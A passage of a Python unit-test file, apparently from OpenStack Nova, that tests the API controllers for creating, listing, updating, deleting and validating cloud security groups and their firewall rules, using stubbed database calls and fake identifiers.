'uuid': FAKE_UUID1,
'name': 'asdf'})
def return_server_by_uuid(context, server_uuid,
columns_to_join=None,
use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'power_state': 0x01,
'host': "localhost",
'uuid': server_uuid,
'name': 'asdf'})
def return_non_running_server(context, server_id, columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id, 'power_state': power_state.SHUTDOWN,
'uuid': FAKE_UUID1, 'host': "localhost", 'name': 'asdf'})
def return_security_group_by_name(context, project_id, group_name):
return {'id': 1, 'name': group_name,
"instances": [{'id': 1, 'uuid': FAKE_UUID1}]}
def return_security_group_without_instances(context, project_id, group_name):
return {'id': 1, 'name': group_name}
def return_server_nonexistent(context, server_id, columns_to_join=None):
raise exception.InstanceNotFound(instance_id=server_id)
class TestSecurityGroupsV21(test.TestCase):
secgrp_ctl_cls = secgroups_v21.SecurityGroupController
server_secgrp_ctl_cls = secgroups_v21.ServerSecurityGroupController
secgrp_act_ctl_cls = secgroups_v21.SecurityGroupActionController
def setUp(self):
super(TestSecurityGroupsV21, self).setUp()
self.controller = self.secgrp_ctl_cls()
self.server_controller = self.server_secgrp_ctl_cls()
self.manager = self.secgrp_act_ctl_cls()
# This needs to be done here to set fake_id because the derived
# class needs to be called first if it wants to set
# 'security_group_api' and this setUp method needs to be called.
if self.controller.security_group_api.id_is_uuid:
self.fake_id = '11111111-1111-1111-1111-111111111111'
else:
self.fake_id = '11111111'
def _assert_no_security_groups_reserved(self, context):
"""Check that no reservations are leaked during tests."""
result = quota.QUOTAS.get_project_quotas(context, context.project_id)
self.assertEqual(result['security_groups']['reserved'], 0)
def _assert_security_groups_in_use(self, project_id, user_id, in_use):
context = context_maker.get_admin_context()
result = quota.QUOTAS.get_user_quotas(context, project_id, user_id)
self.assertEqual(result['security_groups']['in_use'], in_use)
def test_create_security_group(self):
sg = security_group_template()
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
res_dict = self.controller.create(req, {'security_group': sg})
self.assertEqual(res_dict['security_group']['name'], 'test')
self.assertEqual(res_dict['security_group']['description'],
'test-description')
def test_create_security_group_with_no_name(self):
sg = security_group_template()
del sg['name']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, sg)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_description(self):
sg = security_group_template()
del sg['description']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_empty_description(self):
sg = security_group_template()
sg['description'] = ""
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
try:
self.controller.create(req, {'security_group': sg})
self.fail('Should have raised BadRequest exception')
except webob.exc.HTTPBadRequest as exc:
self.assertEqual('description has a minimum character requirement'
' of 1.', exc.explanation)
except exception.InvalidInput:
self.fail('Should have raised BadRequest exception instead of')
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_blank_name(self):
sg = security_group_template(name='')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_whitespace_name(self):
sg = security_group_template(name=' ')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_blank_description(self):
sg = security_group_template(description='')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_whitespace_description(self):
sg = security_group_template(description=' ')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_duplicate_name(self):
sg = security_group_template()
# FIXME: Stub out _get instead of creating twice
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.controller.create(req, {'security_group': sg})
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_body(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, None)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_security_group(self):
body = {'no-securityGroup': None}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, body)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_above_255_characters_name(self):
sg = security_group_template(name='1234567890' * 26)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_above_255_characters_description(self):
sg = security_group_template(description='1234567890' * 26)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_non_string_name(self):
sg = security_group_template(name=12)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_non_string_description(self):
sg = security_group_template(description=12)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_quota_limit(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
for num in range(1, CONF.quota_security_groups):
name = 'test%s' % num
sg = security_group_template(name=name)
res_dict = self.controller.create(req, {'security_group': sg})
self.assertEqual(res_dict['security_group']['name'], name)
sg = security_group_template()
self.assertRaises(webob.exc.HTTPForbidden, self.controller.create,
req, {'security_group': sg})
def test_get_security_group_list(self):
groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
groups.append(sg)
expected = {'security_groups': groups}
def return_security_groups(context, project_id):
return [security_group_db(sg) for sg in groups]
self.stubs.Set(nova.db, 'security_group_get_by_project',
return_security_groups)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
res_dict = self.controller.index(req)
self.assertEqual(res_dict, expected)
def test_get_security_group_list_missing_group_id_rule(self):
groups = []
rule1 = security_group_rule_template(cidr='10.2.3.124/24',
parent_group_id=1,
group_id={}, id=88,
protocol='TCP')
rule2 = security_group_rule_template(cidr='10.2.3.125/24',
parent_group_id=1,
id=99, protocol=88,
group_id='HAS_BEEN_DELETED')
sg = security_group_template(id=1,
name='test',
description='test-desc',
rules=[rule1, rule2])
groups.append(sg)
# An expected rule here needs to be created as the api returns
# different attributes on the rule for a response than what was
# passed in. For example:
# "cidr": "0.0.0.0/0" ->"ip_range": {"cidr": "0.0.0.0/0"}
expected_rule = security_group_rule_template(
ip_range={'cidr': '10.2.3.124/24'}, parent_group_id=1,
group={}, id=88, ip_protocol='TCP')
expected = security_group_template(id=1,
name='test',
description='test-desc',
rules=[expected_rule])
expected = {'security_groups': [expected]}
def return_security_groups(context, project, search_opts):
return [security_group_db(sg) for sg in groups]
self.stubs.Set(self.controller.security_group_api, 'list',
return_security_groups)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
res_dict = self.controller.index(req)
self.assertEqual(res_dict, expected)
def test_get_security_group_list_all_tenants(self):
all_groups = []
tenant_groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
all_groups.append(sg)
if name == 'default':
tenant_groups.append(sg)
all = {'security_groups': all_groups}
tenant_specific = {'security_groups': tenant_groups}
def return_all_security_groups(context):
return [security_group_db(sg) for sg in all_groups]
self.stubs.Set(nova.db, 'security_group_get_all',
return_all_security_groups)
def return_tenant_security_groups(context, project_id):
return [security_group_db(sg) for sg in tenant_groups]
self.stubs.Set(nova.db, 'security_group_get_by_project',
return_tenant_security_groups)
path = '/v2/fake/os-security-groups'
req = fakes.HTTPRequest.blank(path, use_admin_context=True)
res_dict = self.controller.index(req)
self.assertEqual(res_dict, tenant_specific)
req = fakes.HTTPRequest.blank('%s?all_tenants=1' % path,
use_admin_context=True)
res_dict = self.controller.index(req)
self.assertEqual(res_dict, all)
def test_get_security_group_by_instance(self):
groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
groups.append(sg)
expected = {'security_groups': groups}
def return_instance(context, server_id,
columns_to_join=None, use_slave=False):
self.assertEqual(server_id, FAKE_UUID1)
return return_server_by_uuid(context, server_id)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_instance)
def return_security_groups(context, instance_uuid):
self.assertEqual(instance_uuid, FAKE_UUID1)
return [security_group_db(sg) for sg in groups]
self.stubs.Set(nova.db, 'security_group_get_by_instance',
return_security_groups)
req = fakes.HTTPRequest.blank('/v2/%s/servers/%s/os-security-groups' %
('fake', FAKE_UUID1))
res_dict = self.server_controller.index(req, FAKE_UUID1)
self.assertEqual(res_dict, expected)
@mock.patch('nova.db.instance_get_by_uuid')
@mock.patch('nova.db.security_group_get_by_instance', return_value=[])
def test_get_security_group_empty_for_instance(self, mock_sec_group,
mock_db_get_ins):
expected = {'security_groups': []}
def return_instance(context, server_id,
columns_to_join=None, use_slave=False):
self.assertEqual(server_id, FAKE_UUID1)
return return_server_by_uuid(context, server_id)
mock_db_get_ins.side_effect = return_instance
req = fakes.HTTPRequest.blank('/v2/%s/servers/%s/os-security-groups' %
('fake', FAKE_UUID1))
res_dict = self.server_controller.index(req, FAKE_UUID1)
self.assertEqual(expected, res_dict)
mock_sec_group.assert_called_once_with(req.environ['nova.context'],
FAKE_UUID1)
def test_get_security_group_by_instance_non_existing(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/os-security-groups')
self.assertRaises(webob.exc.HTTPNotFound,
self.server_controller.index, req, '1')
def test_get_security_group_by_instance_invalid_id(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/servers/invalid/os-security-groups')
self.assertRaises(webob.exc.HTTPNotFound,
self.server_controller.index, req, 'invalid')
def test_get_security_group_by_id(self):
sg = security_group_template(id=2, rules=[])
def return_security_group(context, group_id):
self.assertEqual(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2')
res_dict = self.controller.show(req, '2')
expected = {'security_group': sg}
self.assertEqual(res_dict, expected)
def test_get_security_group_by_invalid_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_get_security_group_by_non_existing_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/%s' %
self.fake_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.fake_id)
def test_update_security_group(self):
sg = security_group_template(id=2, rules=[])
sg_update = security_group_template(id=2, rules=[],
name='update_name', description='update_desc')
def return_security_group(context, group_id):
self.assertEqual(sg['id'], group_id)
return security_group_db(sg)
def return_update_security_group(context, group_id, values,
columns_to_join=None):
self.assertEqual(sg_update['id'], group_id)
self.assertEqual(sg_update['name'], values['name'])
self.assertEqual(sg_update['description'], values['description'])
return security_group_db(sg_update)
self.stubs.Set(nova.db, 'security_group_update',
return_update_security_group)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2')
res_dict = self.controller.update(req, '2',
{'security_group': sg_update})
expected = {'security_group': sg_update}
self.assertEqual(res_dict, expected)
def test_update_security_group_name_to_default(self):
sg = security_group_template(id=2, rules=[], name='default')
def return_security_group(context, group_id):
self.assertEqual(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
req, '2', {'security_group': sg})
def test_update_default_security_group_fail(self):
sg = security_group_template()
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
req, '1', {'security_group': sg})
def test_delete_security_group_by_id(self):
sg = security_group_template(id=1, project_id='fake_project',
user_id='fake_user', rules=[])
self.called = False
def security_group_destroy(context, id):
self.called = True
def return_security_group(context, group_id):
self.assertEqual(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_destroy',
security_group_destroy)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
self.controller.delete(req, '1')
self.assertTrue(self.called)
def test_delete_security_group_by_admin(self):
sg = security_group_template()
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.controller.create(req, {'security_group': sg})
context = req.environ['nova.context']
# Ensure quota usage for security group is correct.
self._assert_security_groups_in_use(context.project_id,
context.user_id, 2)
# Delete the security group by admin.
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2',
use_admin_context=True)
self.controller.delete(req, '2')
# Ensure quota for security group in use is released.
self._assert_security_groups_in_use(context.project_id,
context.user_id, 1)
def test_delete_security_group_by_invalid_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_delete_security_group_by_non_existing_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/%s'
% self.fake_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.fake_id)
def test_delete_security_group_in_use(self):
sg = security_group_template(id=1, rules=[])
def security_group_in_use(context, id):
return True
def return_security_group(context, group_id):
self.assertEqual(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_in_use',
security_group_in_use)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, '1')
def test_associate_by_non_existing_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.assertEqual(return_server(None, '1'),
nova.db.instance_get(None, '1'))
body = dict(addSecurityGroup=dict(name='non-existing'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_by_invalid_server_id(self):
body = dict(addSecurityGroup=dict(name='test'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/invalid/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, 'invalid', body)
def test_associate_without_body(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=None)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_no_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=dict())
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_security_group_name_with_whitespaces(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=dict(name=" "))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_non_existing_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_non_running_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_non_running_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_non_running_server)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_without_instances)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.manager._addSecurityGroup(req, '1', body)
def test_associate_already_associated_security_group_to_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.mox.StubOutWithMock(nova.db, 'instance_add_security_group')
nova.db.instance_add_security_group(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_without_instances)
self.mox.ReplayAll()
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.manager._addSecurityGroup(req, '1', body)
def test_disassociate_by_non_existing_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.assertEqual(return_server(None, '1'),
nova.db.instance_get(None, '1'))
body = dict(removeSecurityGroup=dict(name='non-existing'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_by_invalid_server_id(self):
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(removeSecurityGroup=dict(name='test'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/invalid/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._removeSecurityGroup, req, 'invalid',
body)
def test_disassociate_without_body(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(removeSecurityGroup=None)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_no_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(removeSecurityGroup=dict())
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_security_group_name_with_whitespaces(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(removeSecurityGroup=dict(name=" "))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_non_existing_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(removeSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_non_running_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_non_running_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_non_running_server)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(removeSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.manager._removeSecurityGroup(req, '1', body)
def test_disassociate_already_associated_security_group_to_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_without_instances)
body = dict(removeSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.mox.StubOutWithMock(nova.db, 'instance_remove_security_group')
nova.db.instance_remove_security_group(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
self.mox.ReplayAll()
body = dict(removeSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.manager._removeSecurityGroup(req, '1', body)
class TestSecurityGroupsV2(TestSecurityGroupsV21):
secgrp_ctl_cls = secgroups_v2.SecurityGroupController
server_secgrp_ctl_cls = secgroups_v2.ServerSecurityGroupController
secgrp_act_ctl_cls = secgroups_v2.SecurityGroupActionController
class TestSecurityGroupRulesV21(test.TestCase):
secgrp_ctl_cls = secgroups_v21.SecurityGroupRulesController
def setUp(self):
super(TestSecurityGroupRulesV21, self).setUp()
self.controller = self.secgrp_ctl_cls()
if self.controller.security_group_api.id_is_uuid:
id1 = '11111111-1111-1111-1111-111111111111'
id2 = '22222222-2222-2222-2222-222222222222'
self.invalid_id = '33333333-3333-3333-3333-333333333333'
else:
id1 = 1
id2 = 2
self.invalid_id = '33333333'
self.sg1 = security_group_template(id=id1)
self.sg2 = security_group_template(
id=id2, name='authorize_revoke',
description='authorize-revoke testing')
db1 = security_group_db(self.sg1)
db2 = security_group_db(self.sg2)
def return_security_group(context, group_id, columns_to_join=None):
if group_id == db1['id']:
return db1
if group_id == db2['id']:
return db2
raise exception.SecurityGroupNotFound(security_group_id=group_id)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
self.parent_security_group = db2
def test_create_by_cidr(self):
rule = security_group_rule_template(cidr='10.2.3.124/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.sg2['id'])
self.assertEqual(security_group_rule['ip_range']['cidr'],
"10.2.3.124/24")
def test_create_by_group_id(self):
rule = security_group_rule_template(group_id=self.sg1['id'],
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.sg2['id'])
def test_create_by_same_group_id(self):
rule1 = security_group_rule_template(group_id=self.sg1['id'],
from_port=80, to_port=80,
parent_group_id=self.sg2['id'])
self.parent_security_group['rules'] = [security_group_rule_db(rule1)]
rule2 = security_group_rule_template(group_id=self.sg1['id'],
from_port=81, to_port=81,
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule2})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.sg2['id'])
self.assertEqual(security_group_rule['from_port'], 81)
self.assertEqual(security_group_rule['to_port'], 81)
def test_create_none_value_from_to_port(self):
rule = {'parent_group_id': self.sg1['id'],
'group_id': self.sg1['id']}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertIsNone(security_group_rule['from_port'])
self.assertIsNone(security_group_rule['to_port'])
self.assertEqual(security_group_rule['group']['name'], 'test')
self.assertEqual(security_group_rule['parent_group_id'],
self.sg1['id'])
def test_create_none_value_from_to_port_icmp(self):
rule = {'parent_group_id': self.sg1['id'],
'group_id': self.sg1['id'],
'ip_protocol': 'ICMP'}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertEqual(security_group_rule['ip_protocol'], 'ICMP')
self.assertEqual(security_group_rule['from_port'], -1)
self.assertEqual(security_group_rule['to_port'], -1)
self.assertEqual(security_group_rule['group']['name'], 'test')
self.assertEqual(security_group_rule['parent_group_id'],
self.sg1['id'])
def test_create_none_value_from_to_port_tcp(self):
rule = {'parent_group_id': self.sg1['id'],
'group_id': self.sg1['id'],
'ip_protocol': 'TCP'}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertEqual(security_group_rule['ip_protocol'], 'TCP')
self.assertEqual(security_group_rule['from_port'], 1)
self.assertEqual(security_group_rule['to_port'], 65535)
self.assertEqual(security_group_rule['group']['name'], 'test')
self.assertEqual(security_group_rule['parent_group_id'],
self.sg1['id'])
def test_create_by_invalid_cidr_json(self):
rule = security_group_rule_template(
ip_protocol="tcp",
from_port=22,
to_port=22,
parent_group_id=self.sg2['id'],
cidr="10.2.3.124/2433")
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_by_invalid_tcp_port_json(self):
rule = security_group_rule_template(
ip_protocol="tcp",
from_port=75534,
to_port=22,
parent_group_id=self.sg2['id'],
cidr="10.2.3.124/24")
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_by_invalid_icmp_port_json(self):
rule = security_group_rule_template(
ip_protocol="icmp",
from_port=1,
to_port=256,
parent_group_id=self.sg2['id'],
cidr="10.2.3.124/24")
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_add_existing_rules_by_cidr(self):
rule = security_group_rule_template(cidr='10.0.0.0/24',
parent_group_id=self.sg2['id'])
self.parent_security_group['rules'] = [security_group_rule_db(rule)]
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_add_existing_rules_by_group_id(self):
rule = security_group_rule_template(group_id=1)
self.parent_security_group['rules'] = [security_group_rule_db(rule)]
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_body(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, None)
def test_create_with_no_security_group_rule_in_body(self):
rules = {'test': 'test'}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, rules)
def test_create_with_invalid_parent_group_id(self):
rule = security_group_rule_template(parent_group_id='invalid')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_non_existing_parent_group_id(self):
rule = security_group_rule_template(group_id=None,
parent_group_id=self.invalid_id)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_non_existing_group_id(self):
rule = security_group_rule_template(group_id='invalid',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_invalid_protocol(self):
rule = security_group_rule_template(ip_protocol='invalid-protocol',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_protocol(self):
rule = security_group_rule_template(cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
del rule['ip_protocol']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_invalid_from_port(self):
rule = security_group_rule_template(from_port='666666',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
